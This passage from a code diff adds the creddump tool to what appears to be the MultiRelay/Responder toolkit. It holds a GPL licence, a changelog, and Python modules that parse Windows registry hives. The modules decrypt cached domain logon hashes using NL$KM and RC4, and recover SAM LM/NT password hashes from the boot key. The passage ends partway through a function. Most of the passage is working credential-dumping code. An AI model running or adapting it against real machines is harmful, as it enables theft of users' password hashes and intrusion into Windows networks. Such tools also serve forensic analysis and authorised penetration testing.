#Padding
if len(str(self.fields["File"]))%2==0:
self.fields["FileTerminator"] = "\x00\x00\x00\x00"
else:
self.fields["FileTerminator"] = "\x00\x00"
#Calc first.
self.fields["ActualFileMaxSize"] = struct.pack("<i",len(str(self.fields["File"]))+1)
self.fields["ActualFileSize"] = struct.pack("<i",len(str(self.fields["File"]))+1)
#Convert to unicode.
self.fields["File"] = self.fields["File"].encode('utf-16le')
#Recalculate again, in unicode this time.
self.fields["FileSizeUnicode"] = struct.pack("<h",len(str(self.fields["File"]))+2)
self.fields["MaxFileSizeUnicode"] = struct.pack("<h",len(str(self.fields["File"]))+2)

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tools/MultiRelay/creddump/CHANGELOG Normal file
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@@ -0,0 +1,9 @@
Version: 0.3 Date: 8/1/2012
* Fixed LM and NTLM Hash Corruption issue. Thanks to Jonathan Claudius.
Closes Issue 3.
Version: 0.2 Date: 2/24/2011
* Fixed issue with wrong format specifier being used (L instead of I), which
caused creddump to fail on 64-bit systems.

674
tools/MultiRelay/creddump/COPYING Normal file
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@@ -0,0 +1,674 @@
GNU GENERAL PUBLIC LICENSE
Version 3, 29 June 2007
Copyright (C) 2007 Free Software Foundation, Inc. <http://fsf.org/>
Everyone is permitted to copy and distribute verbatim copies
of this license document, but changing it is not allowed.
Preamble
The GNU General Public License is a free, copyleft license for
software and other kinds of works.
The licenses for most software and other practical works are designed
to take away your freedom to share and change the works. By contrast,
the GNU General Public License is intended to guarantee your freedom to
share and change all versions of a program--to make sure it remains free
software for all its users. We, the Free Software Foundation, use the
GNU General Public License for most of our software; it applies also to
any other work released this way by its authors. You can apply it to
your programs, too.
When we speak of free software, we are referring to freedom, not
price. Our General Public Licenses are designed to make sure that you
have the freedom to distribute copies of free software (and charge for
them if you wish), that you receive source code or can get it if you
want it, that you can change the software or use pieces of it in new
free programs, and that you know you can do these things.
To protect your rights, we need to prevent others from denying you
these rights or asking you to surrender the rights. Therefore, you have
certain responsibilities if you distribute copies of the software, or if
you modify it: responsibilities to respect the freedom of others.
For example, if you distribute copies of such a program, whether
gratis or for a fee, you must pass on to the recipients the same
freedoms that you received. You must make sure that they, too, receive
or can get the source code. And you must show them these terms so they
know their rights.
Developers that use the GNU GPL protect your rights with two steps:
(1) assert copyright on the software, and (2) offer you this License
giving you legal permission to copy, distribute and/or modify it.
For the developers' and authors' protection, the GPL clearly explains
that there is no warranty for this free software. For both users' and
authors' sake, the GPL requires that modified versions be marked as
changed, so that their problems will not be attributed erroneously to
authors of previous versions.
Some devices are designed to deny users access to install or run
modified versions of the software inside them, although the manufacturer
can do so. This is fundamentally incompatible with the aim of
protecting users' freedom to change the software. The systematic
pattern of such abuse occurs in the area of products for individuals to
use, which is precisely where it is most unacceptable. Therefore, we
have designed this version of the GPL to prohibit the practice for those
products. If such problems arise substantially in other domains, we
stand ready to extend this provision to those domains in future versions
of the GPL, as needed to protect the freedom of users.
Finally, every program is threatened constantly by software patents.
States should not allow patents to restrict development and use of
software on general-purpose computers, but in those that do, we wish to
avoid the special danger that patents applied to a free program could
make it effectively proprietary. To prevent this, the GPL assures that
patents cannot be used to render the program non-free.
The precise terms and conditions for copying, distribution and
modification follow.
TERMS AND CONDITIONS
0. Definitions.
"This License" refers to version 3 of the GNU General Public License.
"Copyright" also means copyright-like laws that apply to other kinds of
works, such as semiconductor masks.
"The Program" refers to any copyrightable work licensed under this
License. Each licensee is addressed as "you". "Licensees" and
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To "modify" a work means to copy from or adapt all or part of the work
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A "covered work" means either the unmodified Program or a work based
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To "propagate" a work means to do anything with it that, without
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To "convey" a work means any kind of propagation that enables other
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An interactive user interface displays "Appropriate Legal Notices"
to the extent that it includes a convenient and prominently visible
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1. Source Code.
The "source code" for a work means the preferred form of the work
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may consider it more useful to permit linking proprietary applications with
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0
tools/MultiRelay/creddump/README Normal file
View File

33
tools/MultiRelay/creddump/cachedump.py Normal file
View File

@@ -0,0 +1,33 @@
#!/usr/bin/env python
# This file is part of creddump.
#
# creddump is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# creddump is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with creddump. If not, see <http://www.gnu.org/licenses/>.
"""
@author: Brendan Dolan-Gavitt
@license: GNU General Public License 2.0 or later
@contact: bdolangavitt@wesleyan.edu
"""
import sys
from framework.win32.domcachedump import dump_file_hashes
if len(sys.argv) < 3:
print "usage: %s bootkey <security hive>" % sys.argv[0]
sys.exit(1)
dump_file_hashes(sys.argv[1].decode("hex"), sys.argv[2])

0
tools/MultiRelay/creddump/framework/__init__.py Normal file
View File

141
tools/MultiRelay/creddump/framework/addrspace.py Executable file
View File

@@ -0,0 +1,141 @@
# Volatility
# Copyright (C) 2007 Volatile Systems
#
# Original Source:
# Copyright (C) 2004,2005,2006 4tphi Research
# Author: {npetroni,awalters}@4tphi.net (Nick Petroni and AAron Walters)
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or (at
# your option) any later version.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
#
"""
@author: AAron Walters
@license: GNU General Public License 2.0 or later
@contact: awalters@volatilesystems.com
@organization: Volatile Systems
"""
""" Alias for all address spaces """
import os
import struct
class FileAddressSpace:
def __init__(self, fname, mode='rb', fast=False):
self.fname = fname
self.name = fname
self.fhandle = open(fname, mode)
self.fsize = os.path.getsize(fname)
if fast == True:
self.fast_fhandle = open(fname, mode)
def fread(self,len):
return self.fast_fhandle.read(len)
def read(self, addr, len):
self.fhandle.seek(addr)
return self.fhandle.read(len)
def read_long(self, addr):
string = self.read(addr, 4)
(longval, ) = struct.unpack('L', string)
return longval
def get_address_range(self):
return [0,self.fsize-1]
def get_available_addresses(self):
return [self.get_address_range()]
def is_valid_address(self, addr):
return addr < self.fsize - 1
def close():
self.fhandle.close()
# Code below written by Brendan Dolan-Gavitt
BLOCK_SIZE = 0x1000
class HiveFileAddressSpace:
def __init__(self, fname):
self.fname = fname
self.base = FileAddressSpace(fname)
def vtop(self, vaddr):
return vaddr + BLOCK_SIZE + 4
def read(self, vaddr, length, zero=False):
first_block = BLOCK_SIZE - vaddr % BLOCK_SIZE
full_blocks = ((length + (vaddr % BLOCK_SIZE)) / BLOCK_SIZE) - 1
left_over = (length + vaddr) % BLOCK_SIZE
paddr = self.vtop(vaddr)
if paddr == None and zero:
if length < first_block:
return "\0" * length
else:
stuff_read = "\0" * first_block
elif paddr == None:
return None
else:
if length < first_block:
stuff_read = self.base.read(paddr, length)
if not stuff_read and zero:
return "\0" * length
else:
return stuff_read
stuff_read = self.base.read(paddr, first_block)
if not stuff_read and zero:
stuff_read = "\0" * first_block
new_vaddr = vaddr + first_block
for i in range(0,full_blocks):
paddr = self.vtop(new_vaddr)
if paddr == None and zero:
stuff_read = stuff_read + "\0" * BLOCK_SIZE
elif paddr == None:
return None
else:
new_stuff = self.base.read(paddr, BLOCK_SIZE)
if not new_stuff and zero:
new_stuff = "\0" * BLOCK_SIZE
elif not new_stuff:
return None
else:
stuff_read = stuff_read + new_stuff
new_vaddr = new_vaddr + BLOCK_SIZE
if left_over > 0:
paddr = self.vtop(new_vaddr)
if paddr == None and zero:
stuff_read = stuff_read + "\0" * left_over
elif paddr == None:
return None
else:
stuff_read = stuff_read + self.base.read(paddr, left_over)
return stuff_read
def read_long_phys(self, addr):
string = self.base.read(addr, 4)
(longval, ) = struct.unpack('L', string)
return longval
def is_valid_address(self, vaddr):
paddr = self.vtop(vaddr)
if not paddr: return False
return self.base.is_valid_address(paddr)

301
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# This file is part of creddump.
#
# creddump is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# creddump is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with creddump. If not, see <http://www.gnu.org/licenses/>.
"""
@author: Brendan Dolan-Gavitt
@license: GNU General Public License 2.0 or later
@contact: bdolangavitt@wesleyan.edu
"""
from framework.object import *
from framework.types import regtypes as types
from operator import itemgetter
from struct import unpack
def get_ptr_type(structure, member):
"""Return the type a pointer points to.
Arguments:
structure : the name of the structure from vtypes
member : a list of members
Example:
get_ptr_type('_EPROCESS', ['ActiveProcessLinks', 'Flink']) => ['_LIST_ENTRY']
"""
if len(member) > 1:
_, tp = get_obj_offset(types, [structure, member[0]])
if tp == 'array':
return types[structure][1][member[0]][1][2][1]
else:
return get_ptr_type(tp, member[1:])
else:
return types[structure][1][member[0]][1][1]
class Obj(object):
"""Base class for all objects.
May return a subclass for certain data types to allow
for special handling.
"""
def __new__(typ, name, address, space):
if name in globals():
# This is a bit of "magic"
# Could be replaced with a dict mapping type names to types
return globals()[name](name,address,space)
elif name in builtin_types:
return Primitive(name, address, space)
else:
obj = object.__new__(typ)
return obj
def __init__(self, name, address, space):
self.name = name
self.address = address
self.space = space
# Subclasses can add fields to this list if they want them
# to show up in values() or members(), even if they do not
# appear in the vtype definition
self.extra_members = []
def __getattribute__(self, attr):
try:
return object.__getattribute__(self, attr)
except AttributeError:
pass
if self.name in builtin_types:
raise AttributeError("Primitive types have no dynamic attributes")
try:
off, tp = get_obj_offset(types, [self.name, attr])
except:
raise AttributeError("'%s' has no attribute '%s'" % (self.name, attr))
if tp == 'array':
a_len = types[self.name][1][attr][1][1]
l = []
for i in range(a_len):
a_off, a_tp = get_obj_offset(types, [self.name, attr, i])
if a_tp == 'pointer':
ptp = get_ptr_type(self.name, [attr, i])
l.append(Pointer(a_tp, self.address+a_off, self.space, ptp))
else:
l.append(Obj(a_tp, self.address+a_off, self.space))
return l
elif tp == 'pointer':
# Can't just return a Obj here, since pointers need to also
# know what type they point to.
ptp = get_ptr_type(self.name, [attr])
return Pointer(tp, self.address+off, self.space, ptp)
else:
return Obj(tp, self.address+off, self.space)
def __div__(self, other):
if isinstance(other,tuple) or isinstance(other,list):
return Pointer(other[0], self.address, self.space, other[1])
elif isinstance(other,str):
return Obj(other, self.address, self.space)
else:
raise ValueError("Must provide a type name as string for casting")
def members(self):
"""Return a list of this object's members, sorted by offset."""
# Could also just return the list
membs = [ (k, v[0]) for k,v in types[self.name][1].items()]
membs.sort(key=itemgetter(1))
return map(itemgetter(0),membs) + self.extra_members
def values(self):
"""Return a dictionary of this object's members and their values"""
valdict = {}
for k in self.members():
valdict[k] = getattr(self, k)
return valdict
def bytes(self, length=-1):
"""Get bytes starting at the address of this object.
Arguments:
length : the number of bytes to read. Default: size of
this object.
"""
if length == -1:
length = self.size()
return self.space.read(self.address, length)
def size(self):
"""Get the size of this object."""
if self.name in builtin_types:
return builtin_types[self.name][0]
else:
return types[self.name][0]
def __repr__(self):
return "<%s @%08x>" % (self.name, self.address)
def __eq__(self, other):
if not isinstance(other, Obj):
raise TypeError("Types are incomparable")
return self.address == other.address and self.name == other.name
def __ne__(self, other):
return not self.__eq__(other)
def __hash__(self):
return hash(self.address) ^ hash(self.name)
def is_valid(self):
return self.space.is_valid_address(self.address)
def get_offset(self, member):
return get_obj_offset(types, [self.name] + member)
class Primitive(Obj):
"""Class to represent a primitive data type.
Attributes:
value : the python primitive value of this type
"""
def __new__(typ, *args, **kwargs):
obj = object.__new__(typ)
return obj
def __init__(self, name, address, space):
super(Primitive,self).__init__(name, address, space)
length, fmt = builtin_types[name]
data = space.read(address,length)
if not data: self.value = None
else: self.value = unpack(fmt,data)[0]
def __repr__(self):
return repr(self.value)
def members(self):
return []
class Pointer(Obj):
"""Class to represent pointers.
value : the object pointed to
If an attribute is not found in this instance,
the attribute will be looked up in the referenced
object."""
def __new__(typ, *args, **kwargs):
obj = object.__new__(typ)
return obj
def __init__(self, name, address, space, ptr_type):
super(Pointer,self).__init__(name, address, space)
ptr_address = read_value(space, name, address)
if ptr_type[0] == 'pointer':
self.value = Pointer(ptr_type[0], ptr_address, self.space, ptr_type[1])
else:
self.value = Obj(ptr_type[0], ptr_address, self.space)
def __getattribute__(self, attr):
# It's still nice to be able to access things through pointers
# without having to explicitly dereference them, so if we don't
# find an attribute via our superclass, just dereference the pointer
# and return the attribute in the pointed-to type.
try:
return super(Pointer,self).__getattribute__(attr)
except AttributeError:
return getattr(self.value, attr)
def __repr__(self):
return "<pointer to [%s @%08x]>" % (self.value.name, self.value.address)
def members(self):
return self.value.members()
class _UNICODE_STRING(Obj):
"""Class representing a _UNICODE_STRING
Adds the following behavior:
* The Buffer attribute is presented as a Python string rather
than a pointer to an unsigned short.
* The __str__ method returns the value of the Buffer.
"""
def __new__(typ, *args, **kwargs):
obj = object.__new__(typ)
return obj
def __str__(self):
return self.Buffer
# Custom Attributes
def getBuffer(self):
return read_unicode_string(self.space, types, [], self.address)
Buffer = property(fget=getBuffer)
class _CM_KEY_NODE(Obj):
def __new__(typ, *args, **kwargs):
obj = object.__new__(typ)
return obj
def getName(self):
return read_string(self.space, types, ['_CM_KEY_NODE', 'Name'],
self.address, self.NameLength.value)
Name = property(fget=getName)
class _CM_KEY_VALUE(Obj):
def __new__(typ, *args, **kwargs):
obj = object.__new__(typ)
return obj
def getName(self):
return read_string(self.space, types, ['_CM_KEY_VALUE', 'Name'],
self.address, self.NameLength.value)
Name = property(fget=getName)
class _CHILD_LIST(Obj):
def __new__(typ, *args, **kwargs):
obj = object.__new__(typ)
return obj
def getList(self):
lst = []
list_address = read_obj(self.space, types,
['_CHILD_LIST', 'List'], self.address)
for i in range(self.Count.value):
lst.append(Pointer("pointer", list_address+(i*4), self.space,
["_CM_KEY_VALUE"]))
return lst
List = property(fget=getList)
class _CM_KEY_INDEX(Obj):
def __new__(typ, *args, **kwargs):
obj = object.__new__(typ)
return obj
def getList(self):
lst = []
for i in range(self.Count.value):
# we are ignoring the hash value here
off,tp = get_obj_offset(types, ['_CM_KEY_INDEX', 'List', i*2])
lst.append(Pointer("pointer", self.address+off, self.space,
["_CM_KEY_NODE"]))
return lst
List = property(fget=getList)

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# Volatools Basic
# Copyright (C) 2007 Komoku, Inc.
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or (at
# your option) any later version.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
#
"""
@author: AAron Walters and Nick Petroni
@license: GNU General Public License 2.0 or later
@contact: awalters@komoku.com, npetroni@komoku.com
@organization: Komoku, Inc.
"""
import struct
builtin_types = { \
'int' : (4, 'i'), \
'long': (4, 'i'), \
'unsigned long' : (4, 'I'), \
'unsigned int' : (4, 'I'), \
'address' : (4, 'I'), \
'char' : (1, 'c'), \
'unsigned char' : (1, 'B'), \
'unsigned short' : (2, 'H'), \
'short' : (2, 'h'), \
'long long' : (8, 'q'), \
'unsigned long long' : (8, 'Q'), \
'pointer' : (4, 'I'),\
}
def obj_size(types, objname):
if not types.has_key(objname):
raise Exception('Invalid type %s not in types' % (objname))
return types[objname][0]
def builtin_size(builtin):
if not builtin_types.has_key(builtin):
raise Exception('Invalid built-in type %s' % (builtin))
return builtin_types[builtin][0]
def read_value(addr_space, value_type, vaddr):
"""
Read the low-level value for a built-in type.
"""
if not builtin_types.has_key(value_type):
raise Exception('Invalid built-in type %s' % (value_type))
type_unpack_char = builtin_types[value_type][1]
type_size = builtin_types[value_type][0]
buf = addr_space.read(vaddr, type_size)
if buf is None:
return None
(val, ) = struct.unpack(type_unpack_char, buf)
return val
def read_unicode_string(addr_space, types, member_list, vaddr):
offset = 0
if len(member_list) > 1:
(offset, current_type) = get_obj_offset(types, member_list)
buf = read_obj(addr_space, types, ['_UNICODE_STRING', 'Buffer'], vaddr + offset)
length = read_obj(addr_space, types, ['_UNICODE_STRING', 'Length'], vaddr + offset)
if length == 0x0:
return ""
if buf is None or length is None:
return None
readBuf = read_string(addr_space, types, ['char'], buf, length)
if readBuf is None:
return None
try:
readBuf = readBuf.decode('UTF-16').encode('ascii')
except:
return None
return readBuf
def read_string(addr_space, types, member_list, vaddr, max_length=256):
offset = 0
if len(member_list) > 1:
(offset, current_type) = get_obj_offset(types, member_list)
val = addr_space.read(vaddr + offset, max_length)
return val
def read_null_string(addr_space, types, member_list, vaddr, max_length=256):
string = read_string(addr_space, types, member_list, vaddr, max_length)
if string is None:
return None
if (string.find('\0') == -1):
return string
(string, none) = string.split('\0', 1)
return string
def get_obj_offset(types, member_list):
"""
Returns the (offset, type) pair for a given list
"""
member_list.reverse()
current_type = member_list.pop()
offset = 0
while (len(member_list) > 0):
if current_type == 'array':
current_type = member_dict[current_member][1][2][0]
if current_type in builtin_types:
current_type_size = builtin_size(current_type)
else:
current_type_size = obj_size(types, current_type)
index = member_list.pop()
offset += index * current_type_size
continue
elif not types.has_key(current_type):
raise Exception('Invalid type ' + current_type)
member_dict = types[current_type][1]
current_member = member_list.pop()
if not member_dict.has_key(current_member):
raise Exception('Invalid member %s in type %s' % (current_member, current_type))
offset += member_dict[current_member][0]
current_type = member_dict[current_member][1][0]
return (offset, current_type)
def read_obj(addr_space, types, member_list, vaddr):
"""
Read the low-level value for some complex type's member.
The type must have members.
"""
if len(member_list) < 2:
raise Exception('Invalid type/member ' + str(member_list))
(offset, current_type) = get_obj_offset(types, member_list)
return read_value(addr_space, current_type, vaddr + offset)

63
tools/MultiRelay/creddump/framework/types.py Normal file
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# This file is part of creddump.
#
# creddump is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# creddump is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with creddump. If not, see <http://www.gnu.org/licenses/>.
"""
@author: Brendan Dolan-Gavitt
@license: GNU General Public License 2.0 or later
@contact: bdolangavitt@wesleyan.edu
"""
regtypes = {
'_CM_KEY_VALUE' : [ 0x18, {
'Signature' : [ 0x0, ['unsigned short']],
'NameLength' : [ 0x2, ['unsigned short']],
'DataLength' : [ 0x4, ['unsigned long']],
'Data' : [ 0x8, ['unsigned long']],
'Type' : [ 0xc, ['unsigned long']],
'Flags' : [ 0x10, ['unsigned short']],
'Spare' : [ 0x12, ['unsigned short']],
'Name' : [ 0x14, ['array', 1, ['unsigned short']]],
} ],
'_CM_KEY_NODE' : [ 0x50, {
'Signature' : [ 0x0, ['unsigned short']],
'Flags' : [ 0x2, ['unsigned short']],
'LastWriteTime' : [ 0x4, ['_LARGE_INTEGER']],
'Spare' : [ 0xc, ['unsigned long']],
'Parent' : [ 0x10, ['unsigned long']],
'SubKeyCounts' : [ 0x14, ['array', 2, ['unsigned long']]],
'SubKeyLists' : [ 0x1c, ['array', 2, ['unsigned long']]],
'ValueList' : [ 0x24, ['_CHILD_LIST']],
'ChildHiveReference' : [ 0x1c, ['_CM_KEY_REFERENCE']],
'Security' : [ 0x2c, ['unsigned long']],
'Class' : [ 0x30, ['unsigned long']],
'MaxNameLen' : [ 0x34, ['unsigned long']],
'MaxClassLen' : [ 0x38, ['unsigned long']],
'MaxValueNameLen' : [ 0x3c, ['unsigned long']],
'MaxValueDataLen' : [ 0x40, ['unsigned long']],
'WorkVar' : [ 0x44, ['unsigned long']],
'NameLength' : [ 0x48, ['unsigned short']],
'ClassLength' : [ 0x4a, ['unsigned short']],
'Name' : [ 0x4c, ['array', 1, ['unsigned short']]],
} ],
'_CM_KEY_INDEX' : [ 0x8, {
'Signature' : [ 0x0, ['unsigned short']],
'Count' : [ 0x2, ['unsigned short']],
'List' : [ 0x4, ['array', 1, ['unsigned long']]],
} ],
'_CHILD_LIST' : [ 0x8, {
'Count' : [ 0x0, ['unsigned long']],
'List' : [ 0x4, ['unsigned long']],
} ],
}

0
tools/MultiRelay/creddump/framework/win32/__init__.py Normal file
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117
tools/MultiRelay/creddump/framework/win32/domcachedump.py Normal file
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# This file is part of creddump.
#
# creddump is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# creddump is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with creddump. If not, see <http://www.gnu.org/licenses/>.
"""
@author: Brendan Dolan-Gavitt
@license: GNU General Public License 2.0 or later
@contact: bdolangavitt@wesleyan.edu
"""
from framework.win32.rawreg import *
from framework.addrspace import HiveFileAddressSpace
#from framework.win32.hashdump import get_bootkey
from framework.win32.lsasecrets import get_secret_by_name,get_lsa_key
from Crypto.Hash import HMAC
from Crypto.Cipher import ARC4
from struct import unpack
def get_nlkm(secaddr, lsakey):
return get_secret_by_name(secaddr, 'NL$KM', lsakey)
def decrypt_hash(edata, nlkm, ch):
hmac_md5 = HMAC.new(nlkm,ch)
rc4key = hmac_md5.digest()
rc4 = ARC4.new(rc4key)
data = rc4.encrypt(edata)
return data
def parse_cache_entry(cache_data):
(uname_len, domain_len) = unpack("<HH", cache_data[:4])
(domain_name_len,) = unpack("<H", cache_data[60:62])
ch = cache_data[64:80]
enc_data = cache_data[96:]
return (uname_len, domain_len, domain_name_len, enc_data, ch)
def parse_decrypted_cache(dec_data, uname_len,
domain_len, domain_name_len):
uname_off = 72
pad = 2 * ( ( uname_len / 2 ) % 2 )
domain_off = uname_off + uname_len + pad
pad = 2 * ( ( domain_len / 2 ) % 2 )
domain_name_off = domain_off + domain_len + pad
hash = dec_data[:0x10]
username = dec_data[uname_off:uname_off+uname_len]
username = username.decode('utf-16-le')
domain = dec_data[domain_off:domain_off+domain_len]
domain = domain.decode('utf-16-le')
domain_name = dec_data[domain_name_off:domain_name_off+domain_name_len]
domain_name = domain_name.decode('utf-16-le')
return (username, domain, domain_name, hash)
def dump_hashes(Key, secaddr):
bootkey = Key
if not bootkey:
return []
lsakey = get_lsa_key(secaddr, bootkey)
if not lsakey:
return []
nlkm = get_nlkm(secaddr, lsakey)
if not nlkm:
return []
root = get_root(secaddr)
if not root:
return []
cache = open_key(root, ["Cache"])
if not cache:
return []
hashes = []
for v in values(cache):
if v.Name == "NL$Control": continue
data = v.space.read(v.Data.value, v.DataLength.value)
(uname_len, domain_len, domain_name_len,
enc_data, ch) = parse_cache_entry(data)
# Skip if nothing in this cache entry
if uname_len == 0:
continue
dec_data = decrypt_hash(enc_data, nlkm, ch)
(username, domain, domain_name,
hash) = parse_decrypted_cache(dec_data, uname_len,
domain_len, domain_name_len)
hashes.append((username, domain, domain_name, hash))
return hashes
def dump_file_hashes(Key, sechive_fname):
sysaddr = Key
secaddr = HiveFileAddressSpace(sechive_fname)
for (u, d, dn, hash) in dump_hashes(sysaddr, secaddr):
print "%s:%s:%s:%s" % (u.lower(), hash.encode('hex'),
d.lower(), dn.lower())

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# This file is part of creddump.
#
# creddump is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# creddump is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with creddump. If not, see <http://www.gnu.org/licenses/>.
"""
@author: Brendan Dolan-Gavitt
@license: GNU General Public License 2.0 or later
@contact: bdolangavitt@wesleyan.edu
"""
from framework.win32.rawreg import *
from framework.addrspace import HiveFileAddressSpace
try:
from Crypto.Hash import MD5
from Crypto.Cipher import ARC4,DES
except ImportError:
pass
from struct import unpack,pack
odd_parity = [
1, 1, 2, 2, 4, 4, 7, 7, 8, 8, 11, 11, 13, 13, 14, 14,
16, 16, 19, 19, 21, 21, 22, 22, 25, 25, 26, 26, 28, 28, 31, 31,
32, 32, 35, 35, 37, 37, 38, 38, 41, 41, 42, 42, 44, 44, 47, 47,
49, 49, 50, 50, 52, 52, 55, 55, 56, 56, 59, 59, 61, 61, 62, 62,
64, 64, 67, 67, 69, 69, 70, 70, 73, 73, 74, 74, 76, 76, 79, 79,
81, 81, 82, 82, 84, 84, 87, 87, 88, 88, 91, 91, 93, 93, 94, 94,
97, 97, 98, 98,100,100,103,103,104,104,107,107,109,109,110,110,
112,112,115,115,117,117,118,118,121,121,122,122,124,124,127,127,
128,128,131,131,133,133,134,134,137,137,138,138,140,140,143,143,
145,145,146,146,148,148,151,151,152,152,155,155,157,157,158,158,
161,161,162,162,164,164,167,167,168,168,171,171,173,173,174,174,
176,176,179,179,181,181,182,182,185,185,186,186,188,188,191,191,
193,193,194,194,196,196,199,199,200,200,203,203,205,205,206,206,
208,208,211,211,213,213,214,214,217,217,218,218,220,220,223,223,
224,224,227,227,229,229,230,230,233,233,234,234,236,236,239,239,
241,241,242,242,244,244,247,247,248,248,251,251,253,253,254,254
]
# Permutation matrix for boot key
p = [ 0x8, 0x5, 0x4, 0x2, 0xb, 0x9, 0xd, 0x3,
0x0, 0x6, 0x1, 0xc, 0xe, 0xa, 0xf, 0x7 ]
# Constants for SAM decrypt algorithm
aqwerty = "!@#$%^&*()qwertyUIOPAzxcvbnmQQQQQQQQQQQQ)(*@&%\0"
anum = "0123456789012345678901234567890123456789\0"
antpassword = "NTPASSWORD\0"
almpassword = "LMPASSWORD\0"
empty_lm = "aad3b435b51404eeaad3b435b51404ee".decode('hex')
empty_nt = "31d6cfe0d16ae931b73c59d7e0c089c0".decode('hex')
def str_to_key(s):
key = []
key.append( ord(s[0])>>1 )
key.append( ((ord(s[0])&0x01)<<6) | (ord(s[1])>>2) )
key.append( ((ord(s[1])&0x03)<<5) | (ord(s[2])>>3) )
key.append( ((ord(s[2])&0x07)<<4) | (ord(s[3])>>4) )
key.append( ((ord(s[3])&0x0F)<<3) | (ord(s[4])>>5) )
key.append( ((ord(s[4])&0x1F)<<2) | (ord(s[5])>>6) )
key.append( ((ord(s[5])&0x3F)<<1) | (ord(s[6])>>7) )
key.append( ord(s[6])&0x7F )
for i in range(8):
key[i] = (key[i]<<1)
key[i] = odd_parity[key[i]]
return "".join(chr(k) for k in key)
def sid_to_key(sid):
s1 = ""
s1 += chr(sid & 0xFF)
s1 += chr((sid>>8) & 0xFF)
s1 += chr((sid>>16) & 0xFF)
s1 += chr((sid>>24) & 0xFF)
s1 += s1[0];
s1 += s1[1];
s1 += s1[2];
s2 = s1[3] + s1[0] + s1[1] + s1[2]
s2 += s2[0] + s2[1] + s2[2]
return str_to_key(s1),str_to_key(s2)
def find_control_set(sysaddr):
root = get_root(sysaddr)
if not root:
return 1
csselect = open_key(root, ["Select"])
if not csselect:
return 1
for v in values(csselect):
if v.Name == "Current": return v.Data.value
def get_hbootkey(samaddr, bootkey):
sam_account_path = ["SAM", "Domains", "Account"]
root = get_root(samaddr)
if not root: return None
sam_account_key = open_key(root, sam_account_path)
if not sam_account_key: return None
F = None
for v in values(sam_account_key):
if v.Name == 'F':
F = samaddr.read(v.Data.value, v.DataLength.value)
if not F: return None
md5 = MD5.new()
md5.update(F[0x70:0x80] + aqwerty + bootkey + anum)
rc4_key = md5.digest()
rc4 = ARC4.new(rc4_key)
hbootkey = rc4.encrypt(F[0x80:0xA0])
return hbootkey
def get_user_keys(samaddr):
user_key_path = ["SAM", "Domains", "Account", "Users"]
root = get_root(samaddr)
if not root: return []
user_key = open_key(root, user_key_path)
if not user_key: return []
return [k for k in subkeys(user_key) if k.Name != "Names"]
def decrypt_single_hash(rid, hbootkey, enc_hash, lmntstr):
(des_k1,des_k2) = sid_to_key(rid)
d1 = DES.new(des_k1, DES.MODE_ECB)
d2 = DES.new(des_k2, DES.MODE_ECB)
md5 = MD5.new()
md5.update(hbootkey[:0x10] + pack("<L",rid) + lmntstr)
rc4_key = md5.digest()
rc4 = ARC4.new(rc4_key)
obfkey = rc4.encrypt(enc_hash)
hash = d1.decrypt(obfkey[:8]) + d2.decrypt(obfkey[8:])
return hash
def decrypt_hashes(rid, enc_lm_hash, enc_nt_hash, hbootkey):
# LM Hash
if enc_lm_hash:
lmhash = decrypt_single_hash(rid, hbootkey, enc_lm_hash, almpassword)
else:
lmhash = ""
# NT Hash
if enc_nt_hash:
nthash = decrypt_single_hash(rid, hbootkey, enc_nt_hash, antpassword)
else:
nthash = ""
return lmhash,nthash
def get_user_hashes(user_key, hbootkey):
samaddr = user_key.space
rid = int(user_key.Name, 16)
V = None
for v in values(user_key):
if v.Name == 'V':
V = samaddr.read(v.Data.value, v.DataLength.value)
if not V: return None
hash_offset = unpack("<L", V[0x9c:0x9c+4])[0] + 0xCC
lm_exists = True if unpack("<L", V[0x9c+4:0x9c+8])[0] == 20 else False
nt_exists = True if unpack("<L", V[0x9c+16:0x9c+20])[0] == 20 else False
